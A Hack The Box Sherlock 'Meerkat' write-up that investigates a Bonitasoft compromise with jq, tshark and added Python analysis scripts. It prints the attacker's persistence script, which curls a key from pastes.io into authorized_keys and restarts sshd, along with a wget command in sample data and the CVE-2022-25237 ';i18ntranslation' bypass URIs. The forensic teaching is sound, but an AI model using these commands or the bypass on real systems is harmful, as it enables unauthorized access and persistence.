Htb Sherlock Meerkat

Writeup of htb sherlock Meerkat

rating: easy

  1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

The alert signatures in meerkat-alerts.json can be filtered with jq and grep, dropping the noisy python-requests user-agent alerts:

```bash
jq . meerkat-alerts.json | grep signature | grep -v python
```

The name of the Business Management Platform appears in the alert signature.

ans: Bonitasoft

  2. We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

Both meerkat-alerts.json and the pcap show a lot of alerts for the python-requests user agent, and the corresponding requests try a different username/password pair each time. Many distinct credential pairs, rather than many passwords for one user, points to credential stuffing.

ans: Credential Stuffing

  3. Does the vulnerability exploited have a CVE assigned - and if so, which one?

Use the same command as in question 1: the CVE identifier is part of the alert signature.

ans: CVE-2022-25237
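As an added example (not from the original writeup), here is a small Python script that does what the jq | grep pipeline for questions 1 and 3 does, but in a structured way: it parses Suricata EVE JSON alert records, counts each signature together with the source IPs behind it, optionally drops a noisy signature such as the python-requests user-agent rule, and pulls CVE identifiers out of the signature text. It assumes meerkat-alerts.json is EVE-format JSON with the signature at alert.signature; the records embedded below are constructed samples with documentation IP addresses, and their signature wording is illustrative.

```python
"""Summarise Suricata EVE alert records by signature and pull CVE IDs out of them.

Added example, not part of the original writeup. Assumes the alerts file is
Suricata EVE JSON (one object per line, signature under alert.signature).
The records below are constructed samples, not the real meerkat-alerts.json.
"""
import json
import re
from collections import defaultdict

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

# Constructed sample EVE lines (documentation IPs, illustrative signature text).
SAMPLE_EVE = """\
{"timestamp":"2023-01-05T09:00:01.000000+0000","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"192.0.2.10","alert":{"signature":"ET USER_AGENTS python-requests User-Agent Outbound","category":"Generic Protocol Command Decode","severity":3}}
{"timestamp":"2023-01-05T09:00:02.000000+0000","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"192.0.2.10","alert":{"signature":"ET USER_AGENTS python-requests User-Agent Outbound","category":"Generic Protocol Command Decode","severity":3}}
{"timestamp":"2023-01-05T09:00:03.000000+0000","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"192.0.2.10","alert":{"signature":"ET EXPLOIT Bonitasoft Authorization Bypass (CVE-2022-25237)","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2023-01-05T09:00:04.000000+0000","event_type":"flow","src_ip":"198.51.100.7","dest_ip":"192.0.2.10"}
"""


def parse_alerts(text):
    """Yield (signature, src_ip, dest_ip) for every EVE record of type 'alert'."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("event_type") != "alert":
            continue  # flow/http/dns records carry no signature
        yield rec["alert"]["signature"], rec.get("src_ip"), rec.get("dest_ip")


def summarize(text, exclude=None):
    """Count alerts per signature and collect source IPs.

    Signatures matching the `exclude` regex (case-insensitive) are dropped,
    which is the scripted form of `grep -v python` above.
    """
    counts = defaultdict(int)
    sources = defaultdict(set)
    for sig, src, _ in parse_alerts(text):
        if exclude and re.search(exclude, sig, re.IGNORECASE):
            continue
        counts[sig] += 1
        sources[sig].add(src)
    return {sig: {"count": counts[sig], "sources": sorted(sources[sig])} for sig in counts}


def cves_in_alerts(text):
    """Return the sorted list of CVE identifiers mentioned in any alert signature."""
    found = set()
    for sig, _, _ in parse_alerts(text):
        found.update(CVE_RE.findall(sig))
    return sorted(found)


if __name__ == "__main__":
    for sig, info in summarize(SAMPLE_EVE, exclude="python-requests").items():
        print(f"{info['count']:4d}  {sig}  from {info['sources']}")
    print("CVEs referenced:", cves_in_alerts(SAMPLE_EVE))
```

To run it against the real file, replace SAMPLE_EVE with the contents of meerkat-alerts.json (read line by line if it is newline-delimited, or iterate over the array if it is one JSON document).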

  4. Which string was appended to the API URL path to bypass the authorization filter by the attacker's exploit?

For this one I used tshark to analyse the pcap:

```bash
tshark -r meerkat.pcap -Y "http.request.method == POST" -T fields -e http.request.uri | grep -i api
```

This filters the POST requests, prints only the URL path and greps for the API endpoints. The exploit requests carry the string `;i18ntranslation` appended to the API path, for example `/bonita/API/portal/page/;i18ntranslation`.

ans: i18ntranslation
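Why does appending `;i18ntranslation` work? The public description of CVE-2022-25237 is that Bonita's REST API authorization filter used an overly broad exclude pattern for its i18ntranslation resource, so any URI containing that string skipped authentication, while the servlet container strips `;...` path parameters before mapping the request, so the privileged endpoint still handles it. The following Python model is an added example, not Bonita's code: the regexes, the endpoint names and the filter structure are assumptions chosen to show the bug beside a hardened version that normalizes the path before matching.

```python
"""Illustrative model of the authorization-filter bypass behind CVE-2022-25237.

Added example, not Bonita's code. The exclude regexes, endpoint names and the
filter structure are assumptions that follow the public CVE description: an
overly broad exclusion for the i18ntranslation resource let a request whose
URI merely contained that string skip authentication.
"""
import posixpath
import re
from urllib.parse import urlsplit

# Assumed shape of the broad exclusion: unanchored, tested against the raw URI.
EXCLUDE_BROAD = re.compile(r".*i18ntranslation.*")

# Hardened exclusion: anchored, applied to the canonical path only.
# (The translation resource path is an assumption for this example.)
EXCLUDE_EXACT = re.compile(r"^/bonita/API/system/i18ntranslation(/.*)?$")


def normalize_path(uri: str) -> str:
    """Reduce a request URI to the path the container will actually dispatch on.

    Drops the query string, strips ';param' path parameters from each segment
    (servlet containers ignore them when mapping) and collapses '..' segments,
    so the authorization decision is made on the same path as the routing.
    """
    path = urlsplit(uri).path
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments)) or "/"


def vulnerable_filter(uri: str, authenticated: bool) -> bool:
    """Return True if the request is allowed through.

    Bug: the raw URI (path parameters and query included) is matched with an
    unanchored pattern, so '/bonita/API/pageUpload;i18ntranslation?action=add'
    is treated like a public translation lookup.
    """
    if EXCLUDE_BROAD.match(uri):
        return True
    return authenticated


def hardened_filter(uri: str, authenticated: bool) -> bool:
    """Same decision, but made on the normalized path with an anchored pattern."""
    if EXCLUDE_EXACT.match(normalize_path(uri)):
        return True
    return authenticated


if __name__ == "__main__":
    # Constructed requests from an unauthenticated client.
    for uri in (
        "/bonita/API/system/i18ntranslation?locale=en",       # legitimately public
        "/bonita/API/pageUpload",                              # privileged, no trick
        "/bonita/API/pageUpload;i18ntranslation?action=add",   # the exploit's trick
        "/bonita/API/portal/page/;i18ntranslation",
        "/bonita/API/portal/page/../i18ntranslation/",
    ):
        print(f"{uri:55} vulnerable={vulnerable_filter(uri, False)!s:5} "
              f"hardened={hardened_filter(uri, False)!s:5} -> {normalize_path(uri)}")
```

The fix is not only the anchored regex: matching against the normalized path is what closes the `;param` and `/../` variants at once, because the filter and the router then agree on which resource is being requested.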

  5. How many combinations of usernames and passwords were used in the credential stuffing attack?

Filter the POST requests again, this time printing the URI and the request body (`http.file_data`). Drop the `username=install&password=install&_l=en` line (the Bonita default `install` account, excluded here) and the two exploit requests, `/bonita/API/portal/page/;i18ntranslation` and `/bonita/API/pageUpload;i18ntranslation?action=add`, which are not login attempts, then pipe what is left through `uniq` and count the lines. Note that `uniq` only collapses adjacent duplicates, so confirm that repeated attempts are back-to-back in the capture; otherwise use `sort -u` instead.

```bash
tshark -r meerkat.pcap -Y "http.request.method == POST" -T fields -e http.request.uri -e http.file_data \
  | grep -v "username=install&password=install&_l=en" \
  | grep -v "/bonita/API/portal/page/;i18ntranslation" \
  | grep -v "/bonita/API/pageUpload;i18ntranslation?action=add" \
  | uniq | wc -l
```

ans: 56

  6. Which username and password combination was successful?

Run the query above without the `uniq | wc -l` stage: the last combination posted has a different `http.file_data` from the rest. You'll have to confirm it in Wireshark by following the stream and checking the server's response, but the answer is...

ans: seb.broom@forela.co.uk:g0vernm3nt

  7. If any, which text sharing site did the attacker utilise?

Dumping the full request URIs while analysing the pcap shows the text-sharing site: its URL is passed as a parameter value in one of the requests.

```bash
tshark -r meerkat.pcap -T fields -e http.request.full_uri | uniq
```

ans: pastes.io
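As an added example (not part of the original writeup), the following Python script replaces the grep/uniq pipelines of questions 5 and 7 with parsing: it reads the tab-separated output of the tshark command above (URI, then `http.file_data`), keeps only POSTs to the Bonita login service, URL-decodes the form fields, lists the username/password pairs in order, counts the distinct ones regardless of whether duplicates are adjacent, and separately pulls any URL hidden inside URL-encoded parameters. The sample lines embedded below are constructed, not taken from meerkat.pcap; the login path `/bonita/loginservice` and the form field names are assumptions taken from the `username=...&password=...&_l=en` body shown above, and the extension endpoint in the last sample line is invented for illustration.

```python
"""Extract credential-stuffing pairs and embedded URLs from tshark field output.

Added example, not part of the original writeup. Input format assumed:
  tshark -r meerkat.pcap -Y 'http.request.method == POST' -T fields \
         -e http.request.uri -e http.file_data
i.e. one request per line, URI and body separated by a tab.
The sample below is constructed; it is not data from meerkat.pcap.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOGIN_PATH = "/bonita/loginservice"           # assumed from the form body in the writeup
DEFAULT_CREDS = ("install", "install")        # Bonita default account, excluded like grep -v
URL_RE = re.compile(r"https?://[^\s&'\"]+")

# Constructed sample (tab-separated: uri<TAB>body). The extension endpoint name is invented.
SAMPLE_TSV = """\
/bonita/loginservice\tusername=install&password=install&_l=en
/bonita/loginservice\tusername=alice%40forela.co.uk&password=Summer2022%21&_l=en
/bonita/loginservice\tusername=alice%40forela.co.uk&password=Summer2022%21&_l=en
/bonita/loginservice\tusername=bob%40forela.co.uk&password=Welcome1&_l=en
/bonita/API/portal/page/;i18ntranslation\t
/bonita/loginservice\tusername=carol%40forela.co.uk&password=Welcome1&_l=en
/bonita/API/pageUpload;i18ntranslation?action=add\t------WebKitFormBoundary...
/bonita/API/extension/example?p=0&c=1&cmd=wget%20https%3A%2F%2Fpastes.io%2Fraw%2Fbx5gcr0et8\t
"""


def parse_requests(tsv):
    """Yield (uri, body) per non-empty line; lines without a tab get an empty body."""
    for line in tsv.splitlines():
        if not line.strip():
            continue
        uri, _, body = line.partition("\t")
        yield uri, body


def login_attempts(tsv, skip_defaults=True):
    """Ordered list of (username, password) posted to the login service, URL-decoded."""
    attempts = []
    for uri, body in parse_requests(tsv):
        if urlsplit(uri).path != LOGIN_PATH:
            continue                      # exploit and other API calls are not logins
        form = parse_qs(body, keep_blank_values=True)
        pair = (form.get("username", [""])[0], form.get("password", [""])[0])
        if skip_defaults and pair == DEFAULT_CREDS:
            continue
        attempts.append(pair)
    return attempts


def unique_combinations(tsv):
    """Distinct pairs in first-seen order. Unlike `uniq`, non-adjacent repeats are merged too."""
    seen = []
    for pair in login_attempts(tsv):
        if pair not in seen:
            seen.append(pair)
    return seen


def urls_in_requests(tsv):
    """URLs found in URIs or bodies after URL-decoding (catches %3A%2F%2F-encoded links)."""
    found = set()
    for uri, body in parse_requests(tsv):
        for blob in (unquote(uri), unquote(body)):
            found.update(URL_RE.findall(blob))
    return sorted(found)


if __name__ == "__main__":
    combos = unique_combinations(SAMPLE_TSV)
    print(f"{len(login_attempts(SAMPLE_TSV))} login attempts, {len(combos)} distinct pairs")
    for user, pwd in combos:
        print(f"  {user}:{pwd}")
    print("URLs in parameters:", urls_in_requests(SAMPLE_TSV))
```

Feed it the real capture with `tshark ... > posts.tsv` and `unique_combinations(open("posts.tsv").read())`; the last pair in `login_attempts()` is the one to check against the server response for question 6.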

  8. Please provide the filename of the public key used by the attacker to gain persistence on our host.

Visiting hxxps[://]pastes[.]io/raw/bx5gcr0et8 returns a bash script with the following content:

```bash
#!/bin/bash
# fetch the attacker's public key and append it to the ubuntu user's authorized_keys
curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys
# restart sshd so the new key is picked up
sudo service ssh restart
```

The public key is fetched from the second paste, so its filename is the paste ID.

ans: hffgra4unv

  9. Can you confirm the file modified by the attacker to gain persistence?

See the script above: it appends the downloaded key to the ubuntu user's authorized_keys file.

ans: /home/ubuntu/.ssh/authorized_keys

  10. Can you confirm the MITRE technique ID of this type of persistence mechanism?

Adding a key to `~/.ssh/authorized_keys` is Account Manipulation: SSH Authorized Keys, T1098.004. You can confirm this on the MITRE ATT&CK website.

ans: T1098.004

Licensed under CC BY-NC-SA 4.0